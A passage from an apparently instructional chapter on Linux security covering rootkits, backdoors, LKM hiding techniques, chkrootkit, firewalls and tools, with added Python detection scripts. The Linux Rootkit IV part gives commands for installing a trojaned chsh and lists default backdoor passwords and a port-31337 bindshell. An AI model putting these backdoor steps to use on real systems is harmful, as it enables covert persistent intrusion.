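    def __init__(self, request_timeout=2.0):
        self.bindings = {}     # ip -> mac learned from replies
        self.pending = {}      # ip being asked about -> time of the request
        self.request_timeout = request_timeout

    def feed(self, pkt):
        """Process one packet; return a list of alert strings (empty if benign)."""
        alerts = []
        if pkt.op == ARP_REQUEST:
            self.pending[pkt.target_ip] = pkt.t
            return alerts
        if pkt.op != ARP_REPLY:
            return alerts

        # A legitimate reply answers a request for that IP seen recently.
        # Gratuitous ARP sent by a host at boot also trips this check, so on a
        # real network it is a tuning point rather than proof of an attack.
        asked = self.pending.pop(pkt.sender_ip, None)
        if asked is None or pkt.t - asked > self.request_timeout:
            alerts.append(f"unsolicited reply: {pkt.sender_ip} is-at {pkt.sender_mac}")

        # A binding that flips is the classic poisoning footprint.
        known = self.bindings.get(pkt.sender_ip)
        if known is not None and known != pkt.sender_mac:
            alerts.append(f"mac change: {pkt.sender_ip} {known} -> {pkt.sender_mac}")
        self.bindings[pkt.sender_ip] = pkt.sender_mac
        return alerts


def scan(packets):
    """Run a fresh monitor over a packet sequence; return all alerts in order."""
    mon = ArpMonitor()
    alerts = []
    for pkt in packets:
        alerts.extend(mon.feed(pkt))
    return alerts


# Constructed sample: Alice (10.0.0.1) asks for Bob (10.0.0.2), Bob answers,
# then a third host claims Bob's IP with its own MAC without being asked.
SAMPLE = [
    ArpPacket(0.0, ARP_REQUEST, "10.0.0.1", "aa:aa:aa:aa:aa:01", "10.0.0.2"),
    ArpPacket(0.1, ARP_REPLY, "10.0.0.2", "bb:bb:bb:bb:bb:02", "10.0.0.1"),
    ArpPacket(5.0, ARP_REPLY, "10.0.0.2", "cc:cc:cc:cc:cc:03", "10.0.0.1"),
]

if __name__ == "__main__":
    for line in scan(SAMPLE):
        print(line)
```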

start sidebar
Linux Rootkits
  • One way an intruder can maintain access to a compromised system is by installing a rootkit.

  • A rootkit contains a set of tools and replacement executables for many of the operating system's critical components, used to hide evidence of the attacker's presence and to give the attacker backdoor access to the system.

  • Rootkits require root access to install, but once set up, the attacker can get root access back at any time.

end sidebar
 

We revisit rootkits here, basing our discussion on Linux rootkits. Rootkits have conventionally been built for UNIX and Linux, as the intruder has access to the system's code. Here we will focus on rootkits that use the LKM, or Loadable Kernel Module.

A brief review: rootkits appeared in the early 1990s, and one of the first advisories came out in February 1994. This advisory from CERT-CC, CA-1994-01, addressed "Ongoing Network Monitoring Attacks" and was revised on September 19, 1997. Rootkits have increased in popularity since then and are getting increasingly difficult to detect. The most common rootkits are used for SunOS and Linux operating systems. Rootkits contain several different programs. A typical rootkit will include an Ethernet sniffer, which is designed to sniff out passwords. Rootkits can also include Trojan programs used as backdoors, such as inetd or login, and support programs such as ps, netstat, rshd, and ls to hide the attacker's directories or processes. Finally, log cleaners, such as zap, zap2, or z2, are used to remove login entries from the wtmp, utmp, and lastlog files. Some rootkits also enable services such as telnet, shell, and finger. The rootkit may also include scripts that will clean up other files in the /var/log and /var/adm directories. Using the modified ls, ps, and df programs installed on the box, the intruder can "hide" his/her files and programs from the legitimate system administrator.

The intruder next uses programs within the rootkit to clean up the extensive log files generated from the initial vulnerability exploitation. The intruder then uses the installed backdoor program for future access to the compromised system in order to retrieve sniffer logs or launch another attack. If a rootkit is properly installed and the log files are cleaned correctly, a normal system administrator is unaware that the intrusion has even occurred until another site contacts him or the disks fill because of the sniffer logs.

The most severe threat to system security that can be caused by a rootkit comes from those that deploy LKM (Loadable Kernel Module) trojans. Loadable Kernel Modules are a mechanism for adding functionality to an operating-system kernel without requiring a kernel recompilation. Even if an infected system is rebooted, the LKM process will reload the Trojan during boot-up just like any other kernel module. Loadable Kernel Modules are used by many operating systems including Linux, Solaris, and FreeBSD.

The LKM rootkits facilitate the subversion of system binaries. Knark, Adore, and Rtkit are just a few of many LKM rootkits available today. As they run as part of the kernel, these rootkits are less detectable than conventional ones.

Let us see how a typical backdoor can be installed by an intruder.

The goal of a backdoor is to give the hacker access despite countermeasures by the compromised system's administrator, with the least amount of time and visibility. A backdoor that gives a local user root access can be a set-uid program, a trojaned system program, or a cron job backdoor.

  • Set-uid programs. The attacker may plant a set-uid shell program in the file system which, when executed, grants root to the attacker.

  • Trojaned system programs. The attacker can alter system programs, such as "login", so that they give him root access.

  • Cron job backdoor. The attacker may add or modify cron jobs so that his program runs and gives him root access.

A backdoor that gives a remote user root access can be a ".rhosts" file, ssh authorized keys, a bind shell, or a trojaned service.

  • ".rhosts" file. Once "+ +" is in some user's .rhosts file, anybody can log into that account from anywhere without a password.

  • ssh authorized keys. The attacker may put his public key into the victim's ssh configuration file "authorized_keys", so that he can log into that account without a password.

  • Bind shell. The attacker can bind a shell to a certain TCP port. Anybody doing a telnet to that port will get an interactive shell. More sophisticated backdoors of this kind can be UDP based, unconnected TCP, or even ICMP based.

  • Trojaned service. Any open service can be trojaned to give access to a remote user. For example, a trojaned inetd program creates a bind shell on a certain port, or a trojaned ssh daemon gives access when a certain password is entered.
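The backdoor types listed above are exactly what a defender audits for. The following Python script is an added example, not from the original text: it walks a directory tree for set-uid executables, .rhosts files containing "+ +", and every key in any authorized_keys file, and builds a constructed sample tree (hypothetical paths and fake keys) to run against.

```python
"""Audit a filesystem tree for the local and remote backdoor types above.

Added example, not part of the original text. Findings are returned rather
than judged: the administrator compares them against what is expected
(the stock set-uid binaries, the keys they installed themselves).
"""
import os
import stat
import tempfile

KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-nistp256")


def find_setuid(root):
    """Return paths of regular files with the set-uid bit (candidate root shells)."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return sorted(found)


def find_open_rhosts(root):
    """Return .rhosts files where a '+ +' line trusts every user on every host."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        if ".rhosts" not in files:
            continue
        path = os.path.join(dirpath, ".rhosts")
        with open(path, errors="replace") as fh:
            if any(line.split() == ["+", "+"] for line in fh):
                hits.append(path)
    return sorted(hits)


def list_authorized_keys(root):
    """Return (path, key_type, comment) for every key in any authorized_keys.

    An unfamiliar or empty comment is what the administrator should question:
    a planted key rarely carries the owner's usual user@host tag.
    """
    keys = []
    for dirpath, _dirs, files in os.walk(root):
        if "authorized_keys" not in files:
            continue
        path = os.path.join(dirpath, "authorized_keys")
        with open(path, errors="replace") as fh:
            for line in fh:
                fields = line.split()
                if not fields or fields[0].startswith("#"):
                    continue
                # Line layout: [options] key-type base64 [comment]; options
                # may precede the type, so locate the type field explicitly.
                for i, field in enumerate(fields):
                    if field in KEY_TYPES:
                        keys.append((path, field, " ".join(fields[i + 2:])))
                        break
    return keys


def audit(root):
    """Run all three checks over a tree and return them in one report."""
    return {
        "setuid": find_setuid(root),
        "rhosts": find_open_rhosts(root),
        "authorized_keys": list_authorized_keys(root),
    }


def build_demo_tree():
    """Constructed sample tree (hypothetical contents) in a fresh tempdir."""
    root = tempfile.mkdtemp(prefix="backdoor-audit-")

    def put(rel, text, mode=0o644):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(text)
        os.chmod(path, mode)

    put("usr/bin/passwd", "#!/bin/sh\n", 0o4755)            # expected set-uid
    put("tmp/.x/sh", "#!/bin/sh\nexec /bin/sh\n", 0o4755)  # planted set-uid shell
    put("home/alice/.rhosts", "trusted.example alice\n+ +\n")
    put("home/bob/.ssh/authorized_keys",
        "ssh-ed25519 AAAAC3fakekey bob@laptop\n"   # fake key, has owner tag
        "ssh-rsa AAAAB3fakekey\n")                 # fake key, no comment at all
    return root


if __name__ == "__main__":
    for section, items in audit(build_demo_tree()).items():
        print(section, items)
```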

After the intruder plants and runs the backdoor, his attention turns to hiding his files and processes. However, these can be easily detected by the system administrator - especially if the system is running tripwire.

Let us see how an LKM rootkit helps achieve the attacker's needs.

In the case of LKM trojaned rootkits, the attacker can put the LKM in /tmp or /var/tmp, directories that the system administrator cannot monitor. Moreover, he can effectively hide files, processes, and network connections. Since he can modify the kernel structures, he can replace the original system calls with his own versions.

  • To hide files. Commands like "ls" and "du" use sys_getdents() to obtain the contents of a directory. The LKM simply filters out the files that are to be hidden.

  • To hide processes. In Linux implementations, process information is mapped to a directory in the /proc file system. An attacker can modify sys_getdents() and mark a process as invisible in the task structure. The usual implementation is to set the task's flag (signal number) to some unused value.

  • To hide network connections. Similar to process hiding, the attacker can try to hide entries in the /proc/net/tcp and /proc/net/udp files. He can trojan sys_read() so that whenever the system reads these two files and a line matches a certain string, the system call will not reveal the network connection.

  • To redirect file execution. Sometimes the intruder may want to replace system binaries, like "login", without changing the file. He can replace sys_execve() so that whenever the system tries to execute the "login" program, it is redirected to execute the intruder's version of the login program.

  • To hide a sniffer. Here we refer to hiding the promiscuous flag of the network interface. The system call to trojan in this case is sys_ioctl().

  • To communicate with the LKM. Once the hacker has his LKM installed, he will modify some system calls such that when a special parameter is passed, the system call is subverted.

  • To hide the LKM. A perfect LKM must be able to hide itself from the administrator. The LKMs in the system are kept in a singly linked list. To hide an LKM, an attacker can just remove it from the list so that commands such as "lsmod" will not reveal it.

  • To hide symbols in the LKM. Normally functions defined in the LKM are exported so that other LKMs can use them. An attacker can use a macro at the end of the LKM to prevent any symbols from being exported.
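Hiding a process from sys_getdents() leaves a detectable inconsistency, which is the check chkrootkit's chkproc performs: kill(pid, 0) still reports the task alive while readdir on /proc omits it. The following Python script is an added example (not chkrootkit's code, nor from the original text) that performs that comparison and uses the Tgid field of /proc/<pid>/status to rule out ordinary threads, which are also absent from the listing; the sample PID data is constructed.

```python
"""Look for processes hidden from the /proc directory listing.

Added example, not from the original text. A getdents hook can hide a PID
from readdir(/proc), but kill(pid, 0) still finds the task. Thread IDs are
also unlisted while alive, so Tgid is used to tell threads from processes.
"""
import os
import re

_TGID_RE = re.compile(r"^Tgid:\s*(\d+)", re.MULTILINE)


def is_alive(pid):
    """kill(pid, 0) semantics: True if a task with this id exists, whoever owns it."""
    try:
        os.kill(pid, 0)
    except ProcessLookupError:
        return False
    except PermissionError:
        return True
    return True


def tgid_of(pid, proc="/proc"):
    """Thread-group id from /proc/<pid>/status, or None if it cannot be read."""
    try:
        with open(f"{proc}/{pid}/status") as fh:
            match = _TGID_RE.search(fh.read())
    except OSError:
        return None
    return int(match.group(1)) if match else None


def listed_pids(proc="/proc"):
    """PIDs that readdir on /proc actually returns (what ls and ps see)."""
    return {int(name) for name in os.listdir(proc) if name.isdigit()}


def hidden_pids(alive, listed, tgid_lookup, recheck=lambda pid: True):
    """Core comparison, kept free of system calls so it can be tested offline.

    alive:       PIDs that answered kill(pid, 0)
    listed:      set of PIDs visible in the /proc listing
    tgid_lookup: pid -> Tgid, or None when /proc/<pid>/status is unreadable
    recheck:     pid -> bool, confirms a task whose status vanished mid-scan
    Returns sorted PIDs that are alive, unlisted and thread-group leaders
    (Tgid == pid): real processes the listing failed to show.
    """
    suspicious = []
    for pid in alive:
        if pid in listed:
            continue
        tgid = tgid_lookup(pid)
        if tgid is None:
            # Either the task exited between probe and read (benign), or it
            # is hidden from open() as well; the recheck tells them apart.
            if recheck(pid):
                suspicious.append(pid)
        elif tgid == pid:
            suspicious.append(pid)
        # tgid != pid is an ordinary thread; threads are never listed in /proc
    return sorted(suspicious)


def scan_system(max_pid=None, proc="/proc"):
    """Probe 1..max_pid on the live system and return the suspicious PIDs.

    Caveat: with /proc mounted hidepid=1 or 2, other users' processes are
    unlisted and unreadable by design, so run as root or expect noise.
    """
    if max_pid is None:
        with open(f"{proc}/sys/kernel/pid_max") as fh:
            max_pid = int(fh.read())
    listed = listed_pids(proc)
    alive = [pid for pid in range(1, max_pid + 1) if is_alive(pid)]
    found = hidden_pids(alive, listed, lambda pid: tgid_of(pid, proc), recheck=is_alive)
    # Processes started after the listing was taken are not hidden, just new.
    return [pid for pid in found if pid not in listed_pids(proc)]


# Constructed sample: 100 is a process with thread 101 (Tgid 100); 555 is
# alive and its own group leader but absent from the listing, i.e. hidden.
SAMPLE_ALIVE = [1, 2, 100, 101, 555]
SAMPLE_LISTED = {1, 2, 100}
SAMPLE_TGID = {1: 1, 2: 2, 100: 100, 101: 100, 555: 555}

if __name__ == "__main__":
    print("sample:", hidden_pids(SAMPLE_ALIVE, SAMPLE_LISTED, SAMPLE_TGID.get))
    print("live  :", scan_system(max_pid=65535))
```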

start sidebar
Linux Rootkit v4 (LR4)
  • Linux Rootkit IV is the latest version of a well known trojan package for Linux systems. The rootkit comes with the following utility programs and trojaned system commands: bindshell, chfn, chsh, crontab, du, find, fix, ifconfig, inetd, killall, linsniffer, login, ls, netstat, passwd, pidof, ps, rshd, sniffchk, syslogd, tcpd, top, wted, z2

  • In the example below we will try the change shell command (chsh). Compile only chsh in the chsh directory and use 'fix' to replace the original with the trojan version.

     $ make
     gcc -c -pipe -O2 -m486 -fomit-frame-pointer -I. -I -DSBINDER=\"\" -DUSRSBINDER=\"\" -DLOGDIR=\"\" -DVARPATH=\"\" chsh.c -o chsh.o
     gcc -c -pipe -O2 -m486 -fomit-frame-pointer -I. -I -DSBINDER=\"\" -DUSRSBINDER=\"\" -DLOGDIR=\"\" -DVARPATH=\"\" setpwnam.c -o setpwnam.o
     gcc -s -N chsh.o setpwnam.o -o chsh
     $ ../fix /usr/bin/chsh ./chsh ../backup/chsh

  • Once done, the chsh command will spawn a root shell for any user who logs on to the Linux system.

end sidebar
 
Tools  

Linux Rootkit IV (lrk4) was written by Lord Somer and released in November 1998. Other examples of Linux rootkits are lrk, lnrk, lrk2, and lrk3. Most versions include normal rootkit components such as sniffers (linsniffer or sniffit), log editors/erasers (z2, wted, lled), and Trojan horse/backdoor replacement programs to allow remote access, let a user gain root privileges, and hide files, processes, and connections.

Linux Rootkit IV is a very easy rootkit to use and install. Installing lrk4 involves nothing more than executing 'make install'. To install a shadow kit you execute 'make shadow install'. Lrk4 will only work on Linux 2.x kernels. It is a package with sources to several trojaned system commands. When compiled and installed, they give the user running the command a root shell or some other useful functionality, like hiding certain processes, files, sockets etc. Some of the special functionality is initiated by giving a secret password (the default password in the package is 'satori') when the program asks for any specific thing, such as a new shell, login name, password or whatever is specific to the command.

The user will need root privileges to install most of those commands, since he will have to replace existing system files and usually set the 'suid' bit on them. Therefore the attacker has to either root-compromise the victim computer or the local administrator has to accidentally install them. The rootkit comes with the following utility programs and trojaned system commands: bindshell, chfn, chsh, crontab, du, find, fix, ifconfig, inetd, killall, linsniffer, login, ls, netstat, passwd, pidof, ps, rshd, sniffchk, syslogd, tcpd, top, wted, z2

Below is a short description of the utilities within lrk4.

  1. Modified programs that hide the intruder:

    • ls, find, du - these programs will not count or display the intruder's files; the data file is ROOTKIT_FILES_FILE, which defaults to /dev/ptyr. NOTE: all files can be listed with 'ls -/' if SHOWFLAG is enabled. They will hide any files/directories with the names ptyr, hack.dir, and W4r3z.

    • ps, top, pidof - these programs will not display the intruder's processes

    • netstat - will not display traffic from or to specified IP addresses, user-ids, or ports

    • killall - will not kill the intruder's hidden processes

    • ifconfig - will not display the PROMISC flag when the sniffer is running

    • crontab - will hide the cracker's entries; the hidden crontab entry is in /dev/hda02 by default

    • tcpd - will not log connections listed in the configuration file

    • syslogd - will not log connections listed in the configuration file

  2. Trojaned programs with backdoors:

    • chfn - entering the rootkit password as the new full name will drop a root shell

    • chsh - entering the rootkit password as the new shell will drop a root shell

    • passwd - drops a root shell if the rootkit password is entered as the current password

    • login - will allow the cracker to log in under any username with the rootkit password (satori); if root is refused, the username (rewt) will work, and it will disable history logging

  3. Trojaned network daemons:

    • inetd - root shell listening on port 5002; the rootkit password (satori) must be entered as the first line

    • rshd - the username is the rootkit password; a root shell is bound to the port [rsh (hostname) -l (rootkit password)]

  4. Utilities:

    • fix - replaces files and fixes the timestamp/checksum information on them

    • linsniffer - a packet sniffer

    • sniffchk - checks to make sure the sniffer is alive

    • wted - wtmp/utmp editor

    • z2 - erases the wtmp/utmp/lastlog entries for a username (it will only null the entry)

    • bindshell - binds a root shell to a port (31337 by default)

start sidebar
Rootkit Countermeasures

chkrootkit is a tool to locally check for signs of a rootkit.

It contains chkrootkit, a shell script that checks system binaries for rootkit modification.

http://www.chkrootkit.org/

end sidebar
 

The security of an unmodified Linux system depends on the correctness of the kernel, all the privileged applications, and each of their configurations. A problem in any one of these areas may allow the compromise of the entire system. In contrast, the security of a modified system based on the Security-enhanced Linux kernel depends primarily on the correctness of the kernel and its security policy configuration. While problems with the correctness or configuration of applications may allow the limited compromise of individual user programs and system daemons, they do not pose a threat to the security of other user programs and system daemons or to the security of the system as a whole.

Attack Methods  

The typical Rootkit attack proceeds as follows: The intruders use a stolen or easily guessed password to log in to a host. They then gain unauthorized root access by exploiting known vulnerabilities in rdist, sendmail, /bin/mail, loadmodule, rpc.ypupdated, lpr, or passwd. The intruders ftp Rootkit to the host, unpack, compile, and install it; then they collect more username/password pairs and attack more hosts.

Unless the intruder did a poor job of removing traces of his or her visit from the log files, attacks can be hard to detect. Most system administrators don't know their site has been invaded until they are contacted by someone at another site or their disks begin filling up due to the sniffer's logs. Some of the countermeasures apart from encryption are:

chkrootkit is a tool to locally check for signs of a rootkit. It contains:

  • chkrootkit: a shell script that checks system binaries for rootkit modification.

  • ifpromisc.c: checks if the network interface is in promiscuous mode.

  • chklastlog.c: checks for lastlog deletions.

  • chkwtmp.c: checks for wtmp deletions.

  • check_wtmpx.c: checks for wtmpx deletions. (Solaris only)

  • chkproc.c: checks for signs of LKM trojans.

  • chkdirs.c: checks for signs of LKM trojans.

  • strings.c: quick and dirty strings replacement.

Tripwire is a system integrity check tool that does not just look for "attack signatures". Tripwire first creates a database that records each file's binary signature, size, expected change of size, etc. Tripwire stores four cryptographic checksums of the content of each file when it creates the original database. When the software performs a system check, it compares the system with the baseline of the original database. If a modification has occurred, Tripwire alerts the System Manager Station with a violation alert and the System Administrator by email; the violation alert shows what files/directories were modified, added, or deleted.

Bastille Linux is a series of scripts which tighten up security on stock Linux systems by changing permissions and disabling features. Taken to the extreme, this will also prevent legitimate work, and it is more suitable for hardening a dedicated loghost or fileserver than a development system.

LIDS (Linux Intrusion Detection System) is a series of kernel patches that enable module and mountpoint locking. LIDS is available from LIDS.org.

dtk or "Deception Toolkit" is a kit of fake daemons and services designed to waste an intruder's time. dtk is available from all.net/dtk/example.html

Rkdet is a daemon intended to catch someone installing a rootkit or running a packet sniffer. It is designed to run continually with a small footprint under an innocuous name. When triggered, it sends email, appends to a logfile, and disables networking or halts the system.

Secure Linux project: The NSA has a Secure Linux project which includes mandatory access control architecture. The Security-enhanced Linux kernel enforces mandatory access control policies that confine user programs and system servers to the minimum amount of privilege they require to do their jobs. When confined in this way, the ability of these user programs and system daemons to cause harm when compromised (via buffer overflows or misconfigurations, for example) is reduced or eliminated. This confinement mechanism operates independently of the traditional Linux access control mechanisms. It has no concept of a "root" super-user, and does not share the well-known shortcomings of the traditional Linux security mechanisms (such as a dependence on setuid/setgid binaries).

start sidebar
chkrootkit detects the following rootkits
  1. lrk3, lrk4, lrk5, lrk6 (and some variants);

  2. Solaris rootkit;

  3. FreeBSD rootkit;

  4. torn (including some variants and torn v8);

  5. Ambient's Rootkit for Linux (ARK);

  6. Ramen Worm;

  7. rh[67]-shaper;

  8. RSHA;

  9. Romanian rootkit;

  10. RK17;

  11. Lion Worm;

  12. Adore Worm;

  13. LPD Worm;

  14. kenny-rk;

  15. Adore LKM;

  16. ShitC Worm;

  17. Omega Worm;

  18. Wormkit Worm;

  19. Maniac-RK;

  20. dsc-rootkit;

  21. Ducoci rootkit;

  22. x.c Worm;

  23. RST.b trojan;

  24. duarawkz;

  25. knark LKM;

  26. Monkit;

  27. Hidrootkit;

  28. Bobkit;

  29. Pizdakit;

  30. torn (v8.0 variant);

  31. Showtee;

  32. Optickit;

  33. T.R.K;

  34. MithRa's Rootkit;

  35. George;

  36. SucKIT;

  37. Scalper (FreeBSD/Apache chunked encoding worm);

  38. Slapper A, B, C and D (Linux/Apache mod_ssl Worm);

  39. OpenBSD rk v1;

  40. Illogic rootkit;

  41. SK rootkit;

  42. Sebek LKM;

  43. Romanian rootkit;

  44. LOC rootkit;

end sidebar
 

The following rootkits, worms and LKMs are currently detected:

01. lrk3, lrk4, lrk5, lrk6 (and variants);

02. Solaris rootkit;

03. FreeBSD rootkit;

04. torn (and variants);

05. Ambient's Rootkit (ARK);

06. Ramen Worm;

07. rh[67]-shaper;

08. RSHA;

09. Romanian rootkit;

10. RK17;

11. Lion Worm;

12. Adore Worm;

13. LPD Worm;

14. kenny-rk;

15. Adore LKM;

16. ShitC Worm;

17. Omega Worm;

18. Wormkit Worm;

19. Maniac-RK;

20. dsc-rootkit;

21. Ducoci rootkit;

22. x.c Worm;

23. RST.b trojan;

24. duarawkz;

25. knark LKM;

26. Monkit;

27. Hidrootkit;

28. Bobkit;

29. Pizdakit;

30. torn v8.0;

31. Showtee;

32. Optickit;

33. T.R.K;

34. MithRa's Rootkit;

35. George;

36. SucKIT;

37. Scalper;

38. Slapper A, B, C and D;

39. OpenBSD rk v1;

40. Illogic rootkit;

41. SK rootkit.

42. sebek LKM;

43. Romanian rootkit;

44. LOC rootkit;

45. shv4 rootkit;

46. Aquatica rootkit;

47. ZK rootkit;

48. 55808.A Worm;

49. TC2 Worm;

50. Volc rootkit;

51. Gold2 rootkit;

52. Anonoying rootkit;

   
start sidebar
Linux Firewall: IPChains
  • IPChains is a very general TCP/IP packet filter; it allows you to ACCEPT, DENY, MASQ, REDIRECT, or RETURN packets.

  • There are three chains that are always defined: input, output and forward.

  • Each chain is executed at a particular point in a packet's path:

    • the input chain is executed whenever a packet arrives at a network interface

    • the output chain is executed whenever a packet is exiting a network interface, destined elsewhere

    • the forward chain is executed whenever a packet must traverse between multiple interfaces

  • Chains are just rule sets that are executed in order; whenever a packet matches a rule, that rule's target is executed.

end sidebar
 
Tools  

Linux IP firewall chaining software is a program that uses the kernel's IP packet filtering capability. A packet filter looks at the header of a packet and decides the fate of the entire packet. It can decide to DENY the packet (discard the packet as if it had never been received), ACCEPT it (let the packet pass through), or REJECT it (like deny, but notify the source of the packet).

ipchains is a rewrite of the well-known ipfwadm, which was a rewrite of BSD's ipfw and was used to build firewalls in 2.0.x kernels. There are many reasons for this rewrite, but perhaps the most important is that ipfwadm couldn't handle protocols other than TCP, UDP or ICMP and didn't handle fragments.

Example:

# ipchains -A input -j DENY -p all -l -s 127.0.0.0/8 -i eth0 -d 0.0.0.0/0

This rule prevents packets whose source address begins with 127. from entering the machine through eth0, and logs them (-l). The reason for this is that any IP address starting with 127. is a loopback address, only used internally. That means that any packet coming into the ppp or Ethernet device matching this rule is spoofed.

In the above example, input refers to the chain. There are three built-in chains: input, output and forward. The input chain refers to packets that are coming into the machine. These packets can be coming from a variety of sources. The output chain refers to packets that are leaving the machine. Again, these packets can be leaving through any interface which connects the computer to any network. The forward chain refers to packets that are received that are not destined for the machine. These packets are being routed through the machine. Note that each packet that passes through the forward chain also passes through both the input and output chains.

start sidebar
IPTables
  • IPTables replaces the userspace tool ipchains in the Linux 2.4 kernel and beyond. IPTables has many more features than IPChains.

  • Connection tracking capability, i.e. the ability to do stateful packet inspection.

  • Simplified behavior of packets negotiating the built-in chains (INPUT, OUTPUT and FORWARD)

  • A clean separation of packet filtering and network address translation (NAT).

  • Rate-limited connection and logging capability

  • The ability to filter on tcp flag and tcp options, and also MAC addresses.

end sidebar
 

To simplify aspects of datagram processing in the kernel firewalling code and produce a filtering framework that was both much cleaner and much more flexible, Paul Russell made a new framework called netfilter.

The iptables utility is used to configure netfilter filtering rules. Its syntax borrows heavily from the ipchains command, but differs in one very significant respect: it is extensible. What this means is that its functionality can be extended without recompiling it. It manages this trick by using shared libraries.

The iptables command is used to configure both IP filtering and Network Address Translation. To facilitate this, there are two tables of rules called filter and nat. The filter table is assumed if you do not specify the -t option to override it. Five built-in chains are also provided. The INPUT and FORWARD chains are available for the filter table, the PREROUTING and POSTROUTING chains are available for the nat table, and the OUTPUT chain is available for both tables.

All connection tracking is handled in the PREROUTING chain, except locally generated packets which are handled in the OUTPUT chain. This implies that iptables does all recalculation of states within the PREROUTING chain. If an initial packet is sent in a stream, the state gets set to NEW within the OUTPUT chain, and when the system receives a return packet, the state gets changed in the PREROUTING chain to ESTABLISHED. If the first packet is not originated by the local machine, the NEW state is set within the PREROUTING chain. So, all state changes and calculations are done within the PREROUTING and OUTPUT chains of the nat table.

Syntax: iptables [-t table] command [match] [target/jump]

In IPTables, there are four types of ICMP that can be categorized as NEW or ESTABLISHED:

  • Echo request (ping, 8) and echo reply (pong, 0)

  • Timestamp request (13) and reply (14)

  • Information request (15) and reply (16)

  • Address mask request (17) and reply (18)

The requests in each case are classified as NEW and reply as ESTABLISHED.

Other types of ICMP are not request-reply based and can only be related to other connections.

start sidebar
Linux Tools: Application Security
  • Whisker (http://www.wiretrip.net)

    Rain.Forest.Puppy's excellent CGI vulnerability scanner.

  • Flawfinder (http://www.dwheeler.com/flawfinder/)

    Flawfinder is a Python program which searches through source code for potential security flaws, listing potential security flaws sorted by risk, with the most potentially dangerous flaws shown first. This risk level depends not only on the function, but also on the values of the parameters of the function.

  • StackGuard (http://www.immunix.org)

    StackGuard is a compiler that emits programs hardened against "stack smashing" attacks. Stack smashing attacks are a common form of penetration attack. Programs that have been compiled with StackGuard are largely immune to stack smashing attacks. Protection requires no source code changes at all.

  • Libsafe (http://www.avayalabs.com/project/libsafe/index.html)

    It is generally accepted that the best solution to buffer overflow and format string attacks is to fix the defective programs.

end sidebar
 
  • Whisker (http://www.wiretrip.net)

    Rain.Forest.Puppy's excellent CGI vulnerability scanner.

  • Flawfinder (http://www.dwheeler.com/flawfinder/)

    Flawfinder is a Python program which searches through source code for potential security flaws, listing potential security flaws sorted by risk, with the most potentially dangerous flaws shown first. This risk level depends not only on the function, but also on the values of the parameters of the function.

  • StackGuard (http://www.immunix.org)

    StackGuard is a compiler that emits programs hardened against "stack smashing" attacks. Stack smashing attacks are a common form of penetration attack. Programs that have been compiled with StackGuard are largely immune to stack smashing attack. Protection requires no source code changes at all.

  • Libsafe (http://www.avayalabs.com/project/libsafe/index.html)

    It is generally accepted that the best solution to buffer overflow and format string attacks is to fix the defective programs.

start sidebar
Linux Tools: Intrusion Detection Systems
  • Tripwire (http://www.tripwire.com)

    A file and directory integrity checker.

  • LIDS (http://www.turbolinux.com.cn/lids/)

    The LIDS (Linux Intrusion Detection System) is an intrusion detection/defense system in the Linux kernel. The goal is to protect Linux systems by disabling some system calls in the kernel itself.

  • AIDE (http://www.cs.tut.fi/~rammer/aide.html)

    AIDE (Advanced Intrusion Detection Environment) is an Open Source IDS package.

  • Snort (http://www.snort.org)

    Flexible packet sniffer/logger that detects attacks. Snort is a libpcap-based packet sniffer/logger which can be used as a lightweight Network Intrusion Detection System.

  • Samhain (http://samhain.sourceforge.net)

    Samhain is designed for intuitive configuration and tamper-resistance, and can be configured as a client/server application to monitor many hosts on a network from a single central location.

end sidebar
     
  • Tripwire (http://www.tripwire.com)

    A file and directory integrity checker.

  • LIDS (http://www.turbolinux.com.cn/lids/)

    The LIDS (Linux Intrusion Detection System) is an intrusion detection /defense system in the Linux kernel. The goal is to protect Linux systems disabling some system calls in the kernel itself.

  • AIDE (http://www.cs.tut.fi/~rammer/aide.html)

    AIDE (Advanced Intrusion detection Environment) is an Open Source IDS package.

  • Snort (http://www.snort.org)

    Flexible packet sniffer/logger that detects attacks. Snort is a libpcap-based packet sniffer/logger, which can be used as a lightweight Network Intrusion Detection System.

  • Samhain (http://samhain.sourceforge.net)

    Samhain is designed for intuitive configuration and tamper-resistance, and can be configured as a client/server application to monitor many hosts on a network from a single central location.

start sidebar
Linux Tools: Security Testing Tools
  • NMap (http://www.insecure.org/nmap)

    Premier network auditing and testing tool.

  • LSOF (ftp://vic.cc.purdue.edu/pub/tools/unix/lsof)

    LSOF lists open files for running Unix/Linux processes.

  • Netcat (http://www.atstake.com/research/tools/index.html)

    Netcat is a simple Unix utility which reads and writes data across network connections, using the TCP or UDP protocol.

  • Hping2 (http://www.kyuzz.org/antirez/hping/)

    hping2 is a network tool able to send custom ICMP/UDP/TCP packets and to display target replies like ping does with ICMP replies.

  • Nemesis (http://www.packetninja.net/nemesis/)

    The Nemesis Project is designed to be a command-line based, portable human IP stack for Unix/Linux.

end sidebar
     
  • NMap (http://www.insecure.org/nmap)

    Premier network auditing and testing tool.

  • LSOF (ftp://vic.cc.purdue.edu/pub/tools/unix/lsof)

    LSOF lists open files for running Unix/Linux processes.

  • Netcat (http://www.atstake.com/research/tools/index.html)

    Netcat is a simple UNIX utility, which reads and writes data across network connections, using TCP or UDP protocol.

  • Hping2 (http://www.kyuzz.org/antirez/hping/)

    hping2 is a network tool able to send custom ICMP/UDP/TCP packets and to display target replies as ping does with ICMP replies.

  • Nemesis (http://www.packetninja.net/nemesis/)

    The Nemesis Project is designed to be a command-line based, portable human IP stack for Unix/Linux.

start sidebar
Linux Tools: Encryption
  • Stunnel (http://www.stunnel.org)

    Stunnel is a program that allows you to encrypt arbitrary TCP connections inside SSL (Secure Sockets Layer), available on both Unix and Windows. Stunnel can allow you to secure non-SSL aware daemons and protocols (like POP, IMAP, NNTP, LDAP, etc) by having Stunnel provide the encryption, requiring no changes to the daemon's code.

  • OpenSSH/SSH (http://www.openssh.com/)

    SSH (Secure Shell) is a program for logging into a remote machine and for executing commands on a remote machine. It provides secure encrypted communications between two untrusted hosts over an insecure network.

  • GnuPG (http://www.gnupg.org)

    GnuPG is a complete and free replacement for PGP. Since it does not use the patented IDEA algorithm, it can be used without any restrictions.

end sidebar
     
